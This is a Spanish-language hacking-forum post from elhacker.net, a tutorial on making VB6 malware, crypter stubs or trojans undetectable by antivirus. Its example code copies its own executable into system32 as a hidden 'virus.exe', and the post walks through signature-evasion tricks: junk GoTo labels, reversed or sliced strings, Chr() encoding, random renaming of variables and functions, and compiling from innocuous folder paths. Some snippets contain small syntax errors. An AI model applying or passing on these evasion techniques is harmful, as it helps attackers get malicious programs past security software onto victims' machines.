elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Como indetectar un crypter, virus, stub, troyano por source VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como indetectar un crypter, virus, stub, troyano por source VB6  (Leído 2,806 veces)
DroppleX

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Como indetectar un crypter, virus, stub, troyano por source VB6
« en: 14 Noviembre 2014, 17:27 pm »

Empezare mostrando un pequeño code con el que explicare las tecnicas para dejarlo FUD (El code no es detectado pero enseñare el procedimiendo para dejar fud un code que sea detectado)
NOTA: No he probado todos los codes, asi que algún error me lo hacen saber :xD
Código:
Dim ruta As String
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", ruta
Close 1#

Lo primero que podemos hacer (y los mas sencillo) para quitarnos algunas firmas es agregar junk, y basicamente estamos agregando code inutil


Código:
Dim ruta As String
GoTo HJNCEUHH' entre cada linea agregamos un goto "caracteres aletorios"
HJNCEUHH:       ' y justo debajo los mismos caracteres aleatorios
ruta = Environ("windir") & "\system32\virus.exe"
GoTo RV87N7Ysss
RV87N7Ysss:
FileCopy App.Path & "\" & App.EXEName & ".exe", ruta
GoTo dichuwuiodcioaiofcu
dichuwuiodcioaiofcu
SetAttr ruta, vbHidden
 

Otra forma es invirtiendo strings

Código:
Dim ruta As String
ruta = Environ("windir") & StrReverse("exe.suriv\23metsys\")' con StrReverse invertiremos strings
FileCopy App.Path & "\" & App.EXEName & StrReverse("exe."), ruta
SetAttr ruta, vbHidden
 

O colocando partes de string (no se si me explico) puede ser con left(), right(), o Mid()

Código:
Dim ruta As String
[b]Dim extensión As String
extensión = ".exebasura"
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & Left(extensión, 4), ruta 'aqui agarramos los 4 primeros caracteres de "extensión" que son .exe
SetAttr ruta, vbHidden
 

Otro metodo es colocando los caracteren en ascii

Código:
Dim ruta As String
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & Chr(46) & Chr(101) & Chr(120) & Chr(101), ruta ' .exe en ascii
SetAttr ruta, vbHidden
Open ruta For Binary As 1#
Print 1#, "VIRUSXD"
Close 1#

Cambiar los nombres de los modulos y de los forms




Un metodo muy simple de la modificacion de strings, en este caso reemplaze la string ruta por wixadiaixdiawuhxdiahu

Código:
Dim wixadiaixdiawuhxdiahu As String
wixadiaixdiawuhxdiahu = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", wixadiaixdiawuhxdiahu
SetAttr wixadiaixdiawuhxdiahu, vbHidden
Open wixadiaixdiawuhxdiahu For Binary As 1#
Print 1#, "VIRUSXD"
Close 1#

Lo mismo podemos hacer con las funciones y los subs

CODE original:
Código:
Function random(ByVal Caracteres As Long)
Dim randoms As String
For i = 1 To Caracteres
randoms = randoms & Mid("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ1234567890", Int((62 * Rnd) + 1), 1)
Next i

CODE con functions random:
Código:
Function sjudjsjjscsshudjfsj(ByVal chiuashcuhu As Long)
Dim hshdsdshdahuudau As String
For i = 1 To chiuashcuhu
hshdsdshdahuudau = hshdsdshdahuudau & Mid("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ1234567890", Int((62 * Rnd) + 1), 1)
Next i

y por ultimo compilarlo en carpetas que no tengan nombres como virus, malware, stub y cosas asi, por que al compilarlo te guarda en el exe la ruta donde fue compilado. (Ojala en C:\)

Bueno, espero que a alguien le sirva.

Saludos


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
funcionaria este crypter con su stub?
Programación Visual Basic
elguast 2 2,032 Último mensaje 14 Noviembre 2008, 14:36 pm
por elguast
Como introducir el stub dentro del crypter (Al crearlo) « 1 2 »
Programación Visual Basic
Christian.tc 17 10,958 Último mensaje 9 Febrero 2010, 17:07 pm
por Christian.tc
[Ayuda] Stub.dll Indetectar
Dudas Generales
NyxKazuya 3 5,656 Último mensaje 2 Marzo 2011, 06:26 am
por SuperDraco
[?] Indetectar Stub + Dudas
Análisis y Diseño de Malware
MeCraniDOS 5 5,196 Último mensaje 18 Noviembre 2012, 12:57 pm
por Danyfirex
que es un stub viene con el crypter
Análisis y Diseño de Malware
full159 2 4,171 Último mensaje 19 Agosto 2014, 06:03 am
por Mr.Virus
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines